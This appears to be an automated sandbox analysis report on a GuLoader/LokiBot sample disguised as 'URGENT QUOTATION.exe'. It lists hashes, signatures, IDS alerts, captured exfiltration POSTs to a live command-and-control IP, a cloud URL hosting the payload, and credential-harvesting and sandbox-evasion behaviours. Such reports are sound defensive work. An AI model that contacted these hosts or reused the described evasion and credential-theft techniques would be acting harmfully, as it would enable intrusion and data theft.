Analysis Report URGENT QUOTATION.exe

Overview

General Information

Sample Name: URGENT QUOTATION.exe
Analysis ID: 356236
MD5: b49c71be94624173a9683580c792b195
SHA1: 4b78a8199129007580b91060db70ce44fe7278e5
SHA256: 8cf8f18fb85f0e190ff77fd57264cf9e31dd7128f1b4ad43713e128a6d68e867
Tags: GuLoader

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Multi AV Scanner detection for domain / URL
Source: http://51.195.53.221/p.php/594QbwaP456AN Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for submitted file
Source: URGENT QUOTATION.exe Virustotal: Detection: 28% Perma Link
Source: URGENT QUOTATION.exe ReversingLabs: Detection: 48%
Machine Learning detection for sample
Source: URGENT QUOTATION.exe Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: URGENT QUOTATION.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49750 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49750 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49750 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49750 -> 51.195.53.221:80
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 51.195.53.221 51.195.53.221
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown DNS traffic detected: queries for: onedrive.live.com
Source: unknown HTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 190Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 22 Feb 2021 18:55:26 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8
Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: URGENT QUOTATION.exe, 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp String found in binary or memory: https://onedrive.live.com/download?cid=604AA6C584DB9137&resid=604AA6C584DB9137%21123&authkey=ANCFnep

System Summary:

barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: URGENT QUOTATION.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021853EC NtWriteVirtualMemory, 0_2_021853EC
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218613D NtSetInformationThread,NtMapViewOfSection, 0_2_0218613D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02185CF0 NtProtectVirtualMemory, 0_2_02185CF0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021804E7 EnumWindows,NtSetInformationThread,NtWriteVirtualMemory, 0_2_021804E7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186210 NtMapViewOfSection, 0_2_02186210
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186239 NtMapViewOfSection, 0_2_02186239
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186263 NtMapViewOfSection, 0_2_02186263
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186281 NtMapViewOfSection, 0_2_02186281
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186315 NtMapViewOfSection, 0_2_02186315
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218633D NtMapViewOfSection, 0_2_0218633D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186328 NtMapViewOfSection, 0_2_02186328
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186353 NtMapViewOfSection, 0_2_02186353
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186387 NtMapViewOfSection, 0_2_02186387
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218182B NtWriteVirtualMemory, 0_2_0218182B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182822 NtWriteVirtualMemory, 0_2_02182822
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182873 NtWriteVirtualMemory, 0_2_02182873
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021820B4 NtSetInformationThread, 0_2_021820B4
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021828CA NtWriteVirtualMemory, 0_2_021828CA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218290F NtWriteVirtualMemory, 0_2_0218290F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186145 NtMapViewOfSection, 0_2_02186145
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218216A NtSetInformationThread,NtWriteVirtualMemory, 0_2_0218216A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186161 NtMapViewOfSection, 0_2_02186161
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186197 NtMapViewOfSection, 0_2_02186197
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021861B5 NtMapViewOfSection, 0_2_021861B5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021861F5 NtMapViewOfSection, 0_2_021861F5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02180602 NtSetInformationThread, 0_2_02180602
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182605 NtWriteVirtualMemory, 0_2_02182605
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218063F NtSetInformationThread, 0_2_0218063F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182666 NtWriteVirtualMemory, 0_2_02182666
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182689 NtWriteVirtualMemory, 0_2_02182689
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021826B2 NtWriteVirtualMemory, 0_2_021826B2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021826F9 NtWriteVirtualMemory, 0_2_021826F9
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182727 NtWriteVirtualMemory, 0_2_02182727
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182773 NtWriteVirtualMemory, 0_2_02182773
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021827A3 NtWriteVirtualMemory, 0_2_021827A3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218247B NtWriteVirtualMemory, 0_2_0218247B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021824D3 NtWriteVirtualMemory, 0_2_021824D3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021824EB NtWriteVirtualMemory, 0_2_021824EB
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021814E5 NtWriteVirtualMemory, 0_2_021814E5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182523 NtWriteVirtualMemory, 0_2_02182523
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218058F NtSetInformationThread, 0_2_0218058F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182581 NtWriteVirtualMemory, 0_2_02182581
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021825B7 NtWriteVirtualMemory, 0_2_021825B7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021805AB NtSetInformationThread, 0_2_021805AB
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021805CD NtSetInformationThread, 0_2_021805CD
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021845FA NtSetInformationThread,NtWriteVirtualMemory, 0_2_021845FA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00565CF0 NtProtectVirtualMemory, 4_2_00565CF0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562CB0 Sleep,NtProtectVirtualMemory, 4_2_00562CB0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056216A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory, 4_2_0056216A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056210E TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory, 4_2_0056210E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056613D NtSetInformationThread, 4_2_0056613D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562DB2 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562DB2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005620B4 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory, 4_2_005620B4
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562D5B NtProtectVirtualMemory, 4_2_00562D5B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562144 LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562144
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566145 NtSetInformationThread, 4_2_00566145
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056217B NtProtectVirtualMemory, 4_2_0056217B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566161 NtSetInformationThread, 4_2_00566161
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562117 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562117
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562D26 NtProtectVirtualMemory, 4_2_00562D26
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562D29 NtProtectVirtualMemory, 4_2_00562D29
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005661F5 NtSetInformationThread, 4_2_005661F5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005621EF NtProtectVirtualMemory, 4_2_005621EF
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562D96 LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562D96
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566197 NtSetInformationThread, 4_2_00566197
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562D99 LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562D99
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005621B5 NtProtectVirtualMemory, 4_2_005621B5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005661B5 NtSetInformationThread, 4_2_005661B5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562DBB LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562DBB
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562E46 LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562E46
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566263 NtSetInformationThread, 4_2_00566263
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566210 NtSetInformationThread, 4_2_00566210
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562E0F LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562E0F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566239 NtSetInformationThread, 4_2_00566239
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566281 NtSetInformationThread, 4_2_00566281
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566353 NtSetInformationThread, 4_2_00566353
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566315 NtSetInformationThread, 4_2_00566315
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056633D NtSetInformationThread, 4_2_0056633D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566328 NtSetInformationThread, 4_2_00566328
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566387 NtSetInformationThread, 4_2_00566387
Detected potential crypto function
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562F0F 4_2_00562F0F
Sample file is different than original file name gathered from version info
Source: URGENT QUOTATION.exe, 00000000.00000000.646889990.000000000043B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameconstantinsborg.exe vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000000.00000002.674117945.0000000002140000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000004.00000002.711483674.000000001DD80000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000004.00000002.711498445.000000001DED0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000004.00000000.671322005.000000000043B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameconstantinsborg.exe vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe Binary or memory string: OriginalFilenameconstantinsborg.exe vs URGENT QUOTATION.exe
Uses 32bit PE files
Source: URGENT QUOTATION.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/1
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File created: C:\Users\user\AppData\Local\Temp\~DFBD8596DEFB17F0B4.TMP Jump to behavior
Source: URGENT QUOTATION.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: URGENT QUOTATION.exe Virustotal: Detection: 28%
Source: URGENT QUOTATION.exe ReversingLabs: Detection: 48%
Source: unknown Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
Source: unknown Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe' Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: URGENT QUOTATION.exe PID: 6160, type: MEMORY
Source: Yara match File source: Process Memory Space: URGENT QUOTATION.exe PID: 6792, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: URGENT QUOTATION.exe PID: 6160, type: MEMORY
Source: Yara match File source: Process Memory Space: URGENT QUOTATION.exe PID: 6792, type: MEMORY
PE file contains an invalid checksum
Source: URGENT QUOTATION.exe Static PE information: real checksum: 0x29a19 should be: 0x2d90a
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218321F push ebx; iretd 0_2_02183222
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218020B push ebx; iretd 0_2_0218020E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02185A39 push ebx; iretd 0_2_02185A3A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218223D push ebx; iretd 0_2_0218223E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218023F push ebx; iretd 0_2_02180242
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181A31 push ebx; iretd 0_2_02181A32
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02180227 push ebx; iretd 0_2_0218022A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218525B push ebx; iretd 0_2_0218525E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218024B push ebx; iretd 0_2_0218024E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218527B push ebx; iretd 0_2_0218527E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02185A7B push ebx; iretd 0_2_02185A7E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218127F push ebx; iretd 0_2_02181282
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218526F push ebx; iretd 0_2_02185272
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186261 push ebx; iretd 0_2_02186262
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182A63 push ebx; iretd 0_2_02182A66
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218129D push ebx; iretd 0_2_0218129E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02180297 push ebx; iretd 0_2_0218029A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02180287 push ebx; iretd 0_2_0218028A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802B9 push ebx; iretd 0_2_021802BA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182AAF push ebx; iretd 0_2_02182AB2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802A3 push ebx; iretd 0_2_021802A6
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02184AA5 push ebx; iretd 0_2_02184AA6
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021852A5 push ebx; iretd 0_2_021852A6
